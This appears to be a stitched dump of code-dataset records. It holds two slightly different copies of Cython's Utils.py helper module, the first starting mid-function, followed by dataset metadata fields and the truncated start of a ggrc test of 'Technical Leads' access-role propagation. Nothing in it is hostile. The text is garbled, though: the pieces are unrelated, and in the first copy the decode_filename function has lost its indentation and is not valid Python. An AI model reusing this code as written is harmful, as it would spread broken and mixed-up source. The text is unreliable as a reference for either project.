            result = store[args] = f(self, *args)
            return result
    return wrapper
def replace_suffix(path, newsuf):
    """Return *path* with its extension (if any) replaced by *newsuf*."""
    stem = os.path.splitext(path)[0]
    return stem + newsuf
def open_new_file(path):
    """Open *path* for writing as a brand-new ISO-8859-1 text file.

    Any existing file is unlinked first so hard links to old outputs are
    not clobbered in place.
    """
    if os.path.exists(path):
        # Make sure to create a new file here so we can
        # safely hard link the output files.
        os.unlink(path)

    # we use the ISO-8859-1 encoding here because we only write pure
    # ASCII strings or (e.g. for file names) byte encoded strings as
    # Unicode, so we need a direct mapping from the first 256 Unicode
    # characters to a byte sequence, which ISO-8859-1 provides

    # note: can't use io.open() in Py2 as we may be writing str objects
    return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
    """Replace a failed compilation's output with an ``#error`` stub.

    If *st* (a stat struct) is given, access/modification times are
    restored from it so the stub still looks out of date to build tools.
    """
    # Remove junk contents from an output file after a
    # failed compilation.
    # Also sets access and modification times back to
    # those specified by st (a stat struct).
    try:
        f = open_new_file(path)
    except EnvironmentError:
        # best effort: if the file can't be rewritten, leave it alone
        pass
    else:
        f.write(
            "#error Do not use this file, it is the result of a failed Cython compilation.\n")
        f.close()
        if st:
            # mtime-1 keeps the stub strictly older than the source file
            os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
    """Return True if the file at *path* was modified after *time*."""
    return modification_time(path) > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
                               include=False, sys_path=False):
    """Locate the file for *qualified_name* + *suffix* in *dirs*.

    Returns the first existing path, or None (no error is reported).
    With a source position *pos*, the directory of that source file (or
    its root package directory) is searched first. ``include=True``
    disables package dereferencing; ``sys_path=True`` appends sys.path.
    """
    # Search the list of include directories for the given
    # file name. If a source file position is given, first
    # searches the directory containing that file. Returns
    # None if not found, but does not report an error.
    # The 'include' option will disable package dereferencing.
    # If 'sys_path' is True, also search sys.path.
    if sys_path:
        dirs = dirs + tuple(sys.path)

    if pos:
        file_desc = pos[0]
        from Cython.Compiler.Scanning import FileSourceDescriptor
        if not isinstance(file_desc, FileSourceDescriptor):
            raise RuntimeError("Only file sources for code supported")
        if include:
            dirs = (os.path.dirname(file_desc.filename),) + dirs
        else:
            dirs = (find_root_package_dir(file_desc.filename),) + dirs

    # "a.b.c" + ".pxd" -> "a.b.c.pxd" (flat lookup form)
    dotted_filename = qualified_name
    if suffix:
        dotted_filename += suffix

    if not include:
        # split into package path + module for the package-aware lookup
        names = qualified_name.split('.')
        package_names = tuple(names[:-1])
        module_name = names[-1]
        module_filename = module_name + suffix
        package_filename = "__init__" + suffix

    for dir in dirs:
        path = os.path.join(dir, dotted_filename)
        if path_exists(path):
            return path
        if not include:
            package_dir = check_package_dir(dir, package_names)
            if package_dir is not None:
                # module file directly inside the package ...
                path = os.path.join(package_dir, module_filename)
                if path_exists(path):
                    return path
                # ... or the module is itself a package (__init__ file)
                path = os.path.join(dir, package_dir, module_name,
                                    package_filename)
                if path_exists(path):
                    return path

    # Arcadia-specific lookup: search for packages in include paths,
    # ignoring existence of __init__.py files as packages markers
    # (they are not required by Arcadia build system)
    if not include:
        for dir in dirs:
            package_dir = os.path.join(dir, *package_names)
            path = os.path.join(package_dir, module_filename)
            if path_exists(path):
                return path
            path = os.path.join(dir, package_dir, module_name,
                                package_filename)
            if path_exists(path):
                return path

    return None
@cached_function
def find_root_package_dir(file_path):
    """Walk up from *file_path* to the topmost directory that is still a
    package (contains an ``__init__`` file); return that directory."""
    dir = os.path.dirname(file_path)
    if file_path == dir:
        # reached the filesystem root
        return dir
    elif is_package_dir(dir):
        return find_root_package_dir(dir)
    else:
        return dir
@cached_function
def check_package_dir(dir, package_names):
    """Return ``dir/<p1>/<p2>/...`` if every level along *package_names*
    is a package directory, else None."""
    for dirname in package_names:
        dir = os.path.join(dir, dirname)
        if not is_package_dir(dir):
            return None
    return dir
@cached_function
def is_package_dir(dir_path):
    """Return 1 if *dir_path* contains any ``__init__`` marker file,
    else None (implicit) — callers only test truthiness."""
    for filename in ("__init__.py",
                     "__init__.pyc",
                     "__init__.pyx",
                     "__init__.pxd"):
        path = os.path.join(dir_path, filename)
        if path_exists(path):
            return 1
@cached_function
def path_exists(path):
    """Like os.path.exists, but also finds files packed inside the zip
    archive of a PEP 302 loader (e.g. a zipimport-ed distribution)."""
    # try on the filesystem first
    if os.path.exists(path):
        return True
    # figure out if a PEP 302 loader is around
    try:
        loader = __loader__
        # XXX the code below assumes a 'zipimport.zipimporter' instance
        # XXX should be easy to generalize, but too lazy right now to write it
        archive_path = getattr(loader, 'archive', None)
        if archive_path:
            normpath = os.path.normpath(path)
            if normpath.startswith(archive_path):
                # path relative to the archive root
                arcname = normpath[len(archive_path)+1:]
                try:
                    # existence check: get_data raises if absent
                    loader.get_data(arcname)
                    return True
                except IOError:
                    return False
    except NameError:
        # no __loader__ in this environment
        pass
    return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, bytes):
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
    """Open *source_filename* and return its declared source encoding
    (PEP 263), defaulting to "UTF-8" when none is declared."""
    # probe with a lenient UTF-8 reader; only the coding comment matters
    f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
    try:
        return detect_opened_file_encoding(f)
    finally:
        f.close()
def detect_opened_file_encoding(f):
    """Return the PEP 263 encoding declared in the first two lines of the
    already-opened file *f*, or "UTF-8" if none is found.

    The file position is left wherever reading stopped; callers seek/reopen
    as needed.
    """
    # PEPs 263 and 3120
    # Most of the time the first two lines fall in the first 250 chars,
    # and this bulk read/split is much faster.
    lines = f.read(250).split(u"\n")
    if len(lines) > 1:
        m = _match_file_encoding(lines[0])
        if m:
            return m.group(1)
        elif len(lines) > 2:
            # line 0 had no declaration; PEP 263 also allows line 1
            m = _match_file_encoding(lines[1])
            if m:
                return m.group(1)
        else:
            # exactly two chunks read and no declaration on line 0:
            # both candidate lines are fully visible, so give up early
            return "UTF-8"
    # Fallback to one-char-at-a-time detection.
    # (Reached when the 250-char read cut a candidate line short.)
    f.seek(0)
    chars = []
    for i in range(2):
        c = f.read(1)
        while c and c != u'\n':
            chars.append(c)
            c = f.read(1)
    encoding = _match_file_encoding(u''.join(chars))
    if encoding:
        return encoding.group(1)
    return "UTF-8"
def skip_bom(f):
    """Position *f* just past a leading BOM, or back at the start if the
    file does not begin with one.

    This could be added to the scanner, but it's *substantially* easier
    to keep it at this level.
    """
    first_char = f.read(1)
    if first_char != u'\uFEFF':
        f.seek(0)
def open_source_file(source_filename, mode="r",
                     encoding=None, error_handling=None):
    """Open a source file with its declared (PEP 263) or given encoding,
    skipping a leading BOM. Falls back to a PEP 302 loader archive when
    the path does not exist on the filesystem.
    """
    if encoding is None:
        # Most of the time the coding is unspecified, so be optimistic that
        # it's UTF-8.
        # Probe recursively with an explicit UTF-8/ignore reader, then
        # either reuse that handle or reopen with the detected encoding.
        f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
        encoding = detect_opened_file_encoding(f)
        if encoding == "UTF-8" and error_handling == 'ignore':
            # probe handle already matches what was requested: reuse it
            f.seek(0)
            skip_bom(f)
            return f
        else:
            f.close()

    if not os.path.exists(source_filename):
        try:
            # may live inside a zipimport archive instead
            loader = __loader__
            if source_filename.startswith(loader.archive):
                return open_source_from_loader(
                    loader, source_filename,
                    encoding, error_handling)
        except (NameError, AttributeError):
            pass

    stream = io.open(source_filename, mode=mode,
                     encoding=encoding, errors=error_handling)
    skip_bom(stream)
    return stream
def open_source_from_loader(loader,
                            source_filename,
                            encoding=None, error_handling=None):
    """Open *source_filename* from a PEP 302 loader's archive and wrap the
    raw bytes in a decoding text stream."""
    nrmpath = os.path.normpath(source_filename)
    # path relative to the archive root
    arcname = nrmpath[len(loader.archive)+1:]
    data = loader.get_data(arcname)
    return io.TextIOWrapper(io.BytesIO(data),
                            encoding=encoding,
                            errors=error_handling)
def str_to_number(value):
    """Parse an integer literal string into a Python int.

    Accepts an optional leading "-", hex ('0x1AF'), Py3 octal ('0o136'),
    Py3 binary ('0b101') and Py2 bare-octal ('0136') notations.

    note: this expects a string as input that was accepted by the
    parser already, so no further validation is done here.
    """
    negative = value[:1] == '-'
    if negative:
        value = value[1:]
    if len(value) < 2 or value[0] != '0':
        # plain decimal (or a single digit); int(_, 0) handles it
        number = int(value, 0)
    else:
        marker = value[1]  # 'x'/'o'/'b' for prefixed forms, a digit otherwise
        if marker in 'xX':
            # hex notation ('0x1AF')
            number = int(value[2:], 16)
        elif marker in 'oO':
            # Py3 octal notation ('0o136')
            number = int(value[2:], 8)
        elif marker in 'bB':
            # Py3 binary notation ('0b101')
            number = int(value[2:], 2)
        else:
            # Py2 octal notation ('0136')
            number = int(value, 8)
    return -number if negative else number
def long_literal(value):
    """Return True if *value* (an int or a literal string) does not fit
    into a signed 32-bit integer."""
    if isinstance(value, basestring):
        value = str_to_number(value)
    return value < -2**31 or value >= 2**31
@cached_function
def get_cython_cache_dir():
    """get the cython cache dir

    Priority:

    1. CYTHON_CACHE_DIR
    2. (OS X): ~/Library/Caches/Cython
       (posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
    3. ~/.cython
    """
    if 'CYTHON_CACHE_DIR' in os.environ:
        # explicit override always wins
        return os.environ['CYTHON_CACHE_DIR']

    parent = None
    if os.name == 'posix':
        if sys.platform == 'darwin':
            parent = os.path.expanduser('~/Library/Caches')
        else:
            # this could fallback on ~/.cache
            parent = os.environ.get('XDG_CACHE_HOME')

    # only use the platform cache dir if it actually exists
    if parent and os.path.isdir(parent):
        return os.path.join(parent, 'cython')

    # last fallback: ~/.cython
    return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
    """Context manager that captures OS-level writes to file descriptor
    *stream* (default 2 = stderr).

    Yields a zero-argument ``get_output()`` callable returning everything
    written so far (decoded with *encoding* if given). A background
    thread drains the capture pipe so writers never block on a full pipe
    buffer; the original descriptor is restored on exit.
    """
    pipe_in = t = None
    orig_stream = os.dup(stream)  # keep copy of original stream
    try:
        pipe_in, pipe_out = os.pipe()
        os.dup2(pipe_out, stream)  # replace stream by copy of pipe
        try:
            os.close(pipe_out)  # close original pipe-out stream
            data = []

            def copy():
                # drain the pipe until the write end is fully closed
                try:
                    while True:
                        d = os.read(pipe_in, 1000)
                        if d:
                            data.append(d)
                        else:
                            break
                finally:
                    os.close(pipe_in)

            def get_output():
                output = b''.join(data)
                if encoding:
                    output = output.decode(encoding)
                return output

            from threading import Thread
            t = Thread(target=copy)
            t.daemon = True  # just in case
            t.start()
            yield get_output
        finally:
            os.dup2(orig_stream, stream)  # restore original stream
            if t is not None:
                # wait for the reader: restoring the fd closed the last
                # write end, so the drain loop is guaranteed to finish
                t.join()
    finally:
        os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
    """Write the byte string *s* followed by *end* to *file*'s binary layer.

    On Py3 text streams the bytes go to ``file.buffer``; on Py2 (or raw
    binary streams) they go to *file* directly. The text layer is
    flushed first so output ordering is preserved.
    """
    file.flush()
    out = getattr(file, 'buffer', file)  # Py3 text stream vs Py2 / raw stream
    out.write(s)
    if end:
        out.write(end)
    if flush:
        out.flush()
class LazyStr:
    """String-like object that defers producing its value to a callback.

    The callback is invoked afresh on every use (str(), repr(), and
    concatenation from either side); nothing is cached.
    """

    def __init__(self, callback):
        self.callback = callback

    def __str__(self):
        return self.callback()

    # repr is intentionally identical to str
    __repr__ = __str__

    def __add__(self, right):
        return self.callback() + right

    def __radd__(self, left):
        return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
    """Class decorator for creating a class with a metaclass."""
    def wrapper(cls):
        body = dict(cls.__dict__)
        slots = body.get('__slots__')
        if slots is not None:
            slot_names = [slots] if isinstance(slots, str) else slots
            # slot descriptors are recreated by the metaclass call
            for slot_name in slot_names:
                body.pop(slot_name)
        # implicit attributes the new type will regenerate itself
        for implicit in ('__dict__', '__weakref__'):
            body.pop(implicit, None)
        return metaclass(cls.__name__, cls.__bases__, body)
    return wrapper
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
    """Memoize *f* on its positional arguments (which must be hashable).

    The undecorated function stays reachable as ``wrapper.uncached``.
    """
    memo = {}

    def wrapper(*args):
        try:
            return memo[args]
        except KeyError:
            value = memo[args] = f(*args)
            return value

    wrapper.uncached = f
    return wrapper
def cached_method(f):
    """Memoize method *f* per instance, keyed on its positional args.

    The cache dict is stored on the instance itself (under a name derived
    from the method name), so each instance keeps an independent cache.
    """
    attr = '__%s_cache' % f.__name__

    def wrapper(self, *args):
        memo = getattr(self, attr, None)
        if memo is None:
            memo = {}
            setattr(self, attr, memo)
        try:
            return memo[args]
        except KeyError:
            value = memo[args] = f(self, *args)
            return value

    return wrapper
def replace_suffix(path, newsuf):
    """Return *path* with its extension replaced by *newsuf*."""
    return os.path.splitext(path)[0] + newsuf
def open_new_file(path):
    """Open *path* for writing as a brand-new file.

    An existing file is unlinked first so previously created hard links
    to the old output are not clobbered in place.
    """
    if os.path.exists(path):
        os.unlink(path)
    # ISO-8859-1 maps the first 256 code points 1:1 onto bytes, which is
    # all we need since only pure ASCII or byte-encoded names are written.
    # codecs.open (rather than io.open) keeps Py2 'str' writes working.
    return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
    """Overwrite *path* with an '#error' marker after a failed
    compilation, then restore its timestamps from the stat result *st*
    (mtime minus one second, so the file never looks up to date)."""
    try:
        f = open_new_file(path)
    except EnvironmentError:
        return
    f.write(
        "#error Do not use this file, it is the result of a failed Cython compilation.\n")
    f.close()
    if st:
        os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
    """Return True if *path* was modified strictly after timestamp *time*."""
    return modification_time(path) > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
                               include=False, sys_path=False):
    """Locate the file for *qualified_name* (+ *suffix*) in *dirs*.

    Returns the path of the first match, or None.  See the inline
    comments for the exact lookup order.
    """
    # Search the list of include directories for the given
    # file name. If a source file position is given, first
    # searches the directory containing that file. Returns
    # None if not found, but does not report an error.
    # The 'include' option will disable package dereferencing.
    # If 'sys_path' is True, also search sys.path.
    if sys_path:
        dirs = dirs + tuple(sys.path)
    if pos:
        file_desc = pos[0]
        from Cython.Compiler.Scanning import FileSourceDescriptor
        if not isinstance(file_desc, FileSourceDescriptor):
            raise RuntimeError("Only file sources for code supported")
        if include:
            dirs = (os.path.dirname(file_desc.filename),) + dirs
        else:
            dirs = (find_root_package_dir(file_desc.filename),) + dirs
    dotted_filename = qualified_name
    if suffix:
        dotted_filename += suffix
    if not include:
        # split "a.b.mod" into the package path ("a", "b") and the module
        names = qualified_name.split('.')
        package_names = tuple(names[:-1])
        module_name = names[-1]
        module_filename = module_name + suffix
        package_filename = "__init__" + suffix
    for dir in dirs:
        # 1) direct hit: "<dir>/a.b.mod<suffix>"
        path = os.path.join(dir, dotted_filename)
        if path_exists(path):
            return path
        if not include:
            # 2) proper package layout: "<dir>/a/b/mod<suffix>"
            package_dir = check_package_dir(dir, package_names)
            if package_dir is not None:
                path = os.path.join(package_dir, module_filename)
                if path_exists(path):
                    return path
                # 3) module-as-package: ".../a/b/mod/__init__<suffix>"
                # NOTE(review): package_dir is already joined with dir, so
                # joining dir again only works if os.path.join discards it
                # (package_dir absolute) -- confirm against upstream Cython.
                path = os.path.join(dir, package_dir, module_name,
                                    package_filename)
                if path_exists(path):
                    return path
    # Arcadia-specific lookup: search for packages in include paths,
    # ignoring existence of __init__.py files as packages markers
    # (they are not required by Arcadia build system)
    if not include:
        for dir in dirs:
            package_dir = os.path.join(dir, *package_names)
            path = os.path.join(package_dir, module_filename)
            if path_exists(path):
                return path
            path = os.path.join(dir, package_dir, module_name,
                                package_filename)
            if path_exists(path):
                return path
    return None
@cached_function
def find_root_package_dir(file_path):
    """Walk upward from *file_path* and return the first ancestor
    directory that is not itself a package (the package tree root)."""
    parent = os.path.dirname(file_path)
    if file_path == parent:
        # reached the filesystem root
        return parent
    if is_package_dir(parent):
        return find_root_package_dir(parent)
    return parent
@cached_function
def check_package_dir(dir, package_names):
    """Return the joined path dir/p1/p2/... if every level is a package
    directory; otherwise None."""
    current = dir
    for component in package_names:
        current = os.path.join(current, component)
        if not is_package_dir(current):
            return None
    return current
@cached_function
def is_package_dir(dir_path):
    """Return 1 if *dir_path* contains any __init__ marker file,
    otherwise fall through and return None (truthiness is what callers
    rely on)."""
    markers = ("__init__.py",
               "__init__.pyc",
               "__init__.pyx",
               "__init__.pxd")
    for filename in markers:
        if path_exists(os.path.join(dir_path, filename)):
            return 1
@cached_function
def path_exists(path):
    """Like os.path.exists, but also finds files packed inside the zip
    archive of a PEP 302 (zipimport) loader, if one is active."""
    # try on the filesystem first
    if os.path.exists(path):
        return True
    # figure out if a PEP 302 loader is around
    try:
        loader = __loader__
        # XXX the code below assumes a 'zipimport.zipimporter' instance
        # XXX should be easy to generalize, but too lazy right now to write it
        archive_path = getattr(loader, 'archive', None)
        if archive_path:
            normpath = os.path.normpath(path)
            if normpath.startswith(archive_path):
                # member name relative to the archive root
                arcname = normpath[len(archive_path)+1:]
                try:
                    # get_data() raises IOError when the member is missing
                    loader.get_data(arcname)
                    return True
                except IOError:
                    return False
    except NameError:
        # __loader__ is not defined, e.g. when running as a plain script
        pass
    return False
# file name encodings
def decode_filename(filename):
    """Decode a bytes filename using the filesystem encoding (falling
    back to the default encoding); undecodable names are returned
    unchanged as bytes."""
    if not isinstance(filename, bytes):
        return filename
    encoding = sys.getfilesystemencoding()
    if encoding is None:
        encoding = sys.getdefaultencoding()
    try:
        return filename.decode(encoding)
    except UnicodeDecodeError:
        return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
    """Open *source_filename* and return its declared source encoding
    (or the "UTF-8" default); the file is closed again afterwards."""
    with open_source_file(source_filename, encoding="UTF-8", error_handling='ignore') as f:
        return detect_opened_file_encoding(f)
def detect_opened_file_encoding(f):
    """Return the coding declared in the first two lines of the open
    text file *f* (PEPs 263 and 3120), defaulting to "UTF-8"."""
    # Most of the time the first two lines fall in the first 250 chars,
    # and this bulk read/split is much faster.
    lines = f.read(250).split(u"\n")
    if len(lines) > 1:
        m = _match_file_encoding(lines[0])
        if m:
            return m.group(1)
        elif len(lines) > 2:
            # the magic comment may also appear on the second line
            m = _match_file_encoding(lines[1])
            if m:
                return m.group(1)
            else:
                return "UTF-8"
    # Fallback to one-char-at-a-time detection.
    # (The bulk read may not have covered two complete lines.)
    f.seek(0)
    chars = []
    for i in range(2):
        c = f.read(1)
        while c and c != u'\n':
            chars.append(c)
            c = f.read(1)
    encoding = _match_file_encoding(u''.join(chars))
    if encoding:
        return encoding.group(1)
    return "UTF-8"
def skip_bom(f):
    """
    Read past a BOM at the beginning of a source file.
    This could be added to the scanner, but it's *substantially* easier
    to keep it at this level.
    """
    first = f.read(1)
    if first != u'\uFEFF':
        # no BOM: rewind so the caller sees the file from the start
        f.seek(0)
def open_source_file(source_filename, mode="r",
                     encoding=None, error_handling=None):
    """Open a source file with its declared encoding.

    If *encoding* is None, the file is first opened as UTF-8 to sniff a
    PEP 263 coding declaration and reopened with the detected encoding
    when it differs.  Files packed in a zipimport archive are opened
    through the active loader.  The returned stream is positioned just
    past any BOM.
    """
    if encoding is None:
        # Most of the time the coding is unspecified, so be optimistic that
        # it's UTF-8.
        f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
        encoding = detect_opened_file_encoding(f)
        if encoding == "UTF-8" and error_handling == 'ignore':
            # already open with the right settings: reuse this stream
            f.seek(0)
            skip_bom(f)
            return f
        else:
            f.close()
    if not os.path.exists(source_filename):
        try:
            # fall back to a PEP 302 loader, e.g. when running from a zip
            loader = __loader__
            if source_filename.startswith(loader.archive):
                return open_source_from_loader(
                    loader, source_filename,
                    encoding, error_handling)
        except (NameError, AttributeError):
            pass
    stream = io.open(source_filename, mode=mode,
                     encoding=encoding, errors=error_handling)
    skip_bom(stream)
    return stream
def open_source_from_loader(loader,
                            source_filename,
                            encoding=None, error_handling=None):
    """Open *source_filename* from a zipimport *loader* as a text stream."""
    relative = os.path.normpath(source_filename)[len(loader.archive) + 1:]
    raw = loader.get_data(relative)
    return io.TextIOWrapper(io.BytesIO(raw),
                            encoding=encoding,
                            errors=error_handling)
def str_to_number(value):
    """Convert a numeric literal (as already accepted by the parser,
    with an optional leading "-") to an int, honouring 0x/0o/0b and the
    legacy Py2 bare-octal ('0136') notations."""
    negative = value.startswith('-')
    if negative:
        value = value[1:]
    if len(value) < 2:
        result = int(value, 0)
    elif value[0] != '0':
        result = int(value, 0)
    else:
        marker = value[1]  # 'x'/'o'/'b' or a bare octal digit
        if marker in 'xX':
            result = int(value[2:], 16)   # hex notation ('0x1AF')
        elif marker in 'oO':
            result = int(value[2:], 8)    # Py3 octal notation ('0o136')
        elif marker in 'bB':
            result = int(value[2:], 2)    # Py3 binary notation ('0b101')
        else:
            result = int(value, 8)        # Py2 octal notation ('0136')
    return -result if negative else result
def long_literal(value):
    """True if *value* (a numeric string or an int) does not fit into a
    signed 32-bit integer."""
    if isinstance(value, basestring):
        value = str_to_number(value)
    return value < -2**31 or value >= 2**31
@cached_function
def get_cython_cache_dir():
    """get the cython cache dir

    Priority:
    1. CYTHON_CACHE_DIR
    2. (OS X): ~/Library/Caches/Cython
       (posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
    3. ~/.cython
    """
    # explicit override always wins
    if 'CYTHON_CACHE_DIR' in os.environ:
        return os.environ['CYTHON_CACHE_DIR']
    parent = None
    if os.name == 'posix':
        if sys.platform == 'darwin':
            parent = os.path.expanduser('~/Library/Caches')
        else:
            # this could fallback on ~/.cache
            parent = os.environ.get('XDG_CACHE_HOME')
    # only use the platform cache root if it actually exists
    if parent and os.path.isdir(parent):
        return os.path.join(parent, 'cython')
    # last fallback: ~/.cython
    return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
    """Context manager that captures everything written to an OS-level
    file descriptor (default 2, i.e. stderr).

    Yields a zero-argument callable; calling it returns the bytes
    captured so far (decoded to str if *encoding* is given).  The output
    is only guaranteed complete after the ``with`` block exits, when the
    reader thread has been joined.
    """
    pipe_in = t = None
    orig_stream = os.dup(stream)  # keep copy of original stream
    try:
        pipe_in, pipe_out = os.pipe()
        os.dup2(pipe_out, stream)  # replace stream by copy of pipe
        try:
            os.close(pipe_out)  # close original pipe-out stream
            data = []
            # Reader thread: drains the pipe so the captured stream never
            # blocks on a full pipe buffer.
            def copy():
                try:
                    while True:
                        d = os.read(pipe_in, 1000)
                        if d:
                            data.append(d)
                        else:
                            break  # writer side closed: EOF
                finally:
                    os.close(pipe_in)
            def get_output():
                output = b''.join(data)
                if encoding:
                    output = output.decode(encoding)
                return output
            from threading import Thread
            t = Thread(target=copy)
            t.daemon = True  # just in case
            t.start()
            yield get_output
        finally:
            # Restoring the fd closes the last writer, which lets copy()
            # see EOF and terminate before we join it.
            os.dup2(orig_stream, stream)  # restore original stream
            if t is not None:
                t.join()
    finally:
        os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
    """Write the byte string *s* (followed by *end*) to *file*.

    Writes go to the stream's binary layer: on Py3 text streams that is
    ``file.buffer``; otherwise the file object itself is used.
    """
    file.flush()
    target = getattr(file, 'buffer', file)  # Py3 text stream vs Py2/binary
    target.write(s)
    if end:
        target.write(end)
    if flush:
        target.flush()
class LazyStr:
    """Lazily evaluated string: the zero-argument *callback* is invoked
    every time the object is rendered or concatenated."""

    def __init__(self, callback):
        self.callback = callback

    def __str__(self):
        return self.callback()

    # repr is intentionally identical to str for this helper
    __repr__ = __str__

    def __add__(self, right):
        return self.callback() + right

    def __radd__(self, left):
        return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
    """Class decorator for creating a class with a metaclass.

    The decorated class is rebuilt through *metaclass*; slot descriptors
    and the implicit __dict__/__weakref__ entries are stripped from the
    class body first so the new class can recreate them.
    """
    def wrapper(cls):
        body = dict(cls.__dict__)
        slots = body.get('__slots__')
        if slots is not None:
            if isinstance(slots, str):
                slots = [slots]
            for name in slots:
                body.pop(name)
        for implicit in ('__dict__', '__weakref__'):
            body.pop(implicit, None)
        return metaclass(cls.__name__, cls.__bases__, body)
    return wrapper
|
en
| 0.85522
|
# # Cython -- Things that don't belong # anywhere else in particular # # Make sure to create a new file here so we can # safely hard link the output files. # we use the ISO-8859-1 encoding here because we only write pure # ASCII strings or (e.g. for file names) byte encoded strings as # Unicode, so we need a direct mapping from the first 256 Unicode # characters to a byte sequence, which ISO-8859-1 provides # note: can't use io.open() in Py2 as we may be writing str objects # Remove junk contents from an output file after a # failed compilation. # Also sets access and modification times back to # those specified by st (a stat struct). # Search the list of include directories for the given # file name. If a source file position is given, first # searches the directory containing that file. Returns # None if not found, but does not report an error. # The 'include' option will disable package dereferencing. # If 'sys_path' is True, also search sys.path. # Arcadia-specific lookup: search for packages in include paths, # ignoring existence of __init__.py files as packages markers # (they are not required by Arcadia build system) # try on the filesystem first # figure out if a PEP 302 loader is around # XXX the code below assumes a 'zipimport.zipimporter' instance # XXX should be easy to generalize, but too lazy right now to write it # file name encodings # support for source file encoding detection # PEPs 263 and 3120 # Most of the time the first two lines fall in the first 250 chars, # and this bulk read/split is much faster. # Fallback to one-char-at-a-time detection. Read past a BOM at the beginning of a source file. This could be added to the scanner, but it's *substantially* easier to keep it at this level. # Most of the time the coding is unspecified, so be optimistic that # it's UTF-8. 
# note: this expects a string as input that was accepted by the # parser already, with an optional "-" sign in front # 0'o' - 0'b' - 0'x' # hex notation ('0x1AF') # Py3 octal notation ('0o136') # Py3 binary notation ('0b101') # Py2 octal notation ('0136') get the cython cache dir Priority: 1. CYTHON_CACHE_DIR 2. (OS X): ~/Library/Caches/Cython (posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined 3. ~/.cython # this could fallback on ~/.cache # last fallback: ~/.cython # keep copy of original stream # replace stream by copy of pipe # close original pipe-out stream # just in case # restore original stream # Py3 # Py2 # Class decorator that adds a metaclass and recreates the class with it. # Copied from 'six'. Class decorator for creating a class with a metaclass.
| 2.350389
| 2
|
test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
|
sfarbotka/ggrc-core
| 0
|
6628129
|
<filename>test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test Access Control roles Technical Leads propagation"""
import ddt
from ggrc.models import all_models
from integration.ggrc.access_control import rbac_factories
from integration.ggrc.access_control.acl_propagation import base
from integration.ggrc.utils import helpers
@ddt.ddt
class TestTechnicalLeadsPropagation(base.TestACLPropagation):
  """Test Technical Leads role permissions propagation.

  These tests differ from the other ACR tests in the acl_propagation
  package because the document is mapped to the parent directly (one
  rank), e.g. Control -> document.Reference URL, checking that the
  parent's role holder can read/create etc. the document and its
  comments.
  """

  # Expected outcome of every (global role, parent model, action)
  # combination; helpers.unwrap expands this into parametrized cases.
  PERMISSIONS = {
      "Creator": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
      "Reader": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
      "Editor": {
          "Universal KeyReport": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
          "Universal AccountBalance": {
              "create_and_map_document": True,
              "read_document": True,
              "update_document": True,
              "delete_document": False,
              "create_and_map_comment": True,
              "read_comment": True,
              "create_and_map_document_comment": True,
              "read_document_comment": True,
          },
      },
  }

  def init_factory(self, role, model, parent):
    """Initialize RBAC factory with propagated Technical Leads role.

    Args:
        role: Global Custom role that user have (Creator/Reader/Editor).
        model: Model name for which factory should be got.
        parent: Model name in scope of which objects should be installed.

    Returns:
        Initialized RBACFactory object.
    """
    self.setup_people()
    # Fetch the "Technical Leads" ACR declared for the parent object type.
    technical_leads = all_models.AccessControlRole.query.filter_by(
        name="Technical Leads",
        object_type=parent,
    ).first()
    rbac_factory = rbac_factories.TEST_FACTORIES_MAPPING[model]
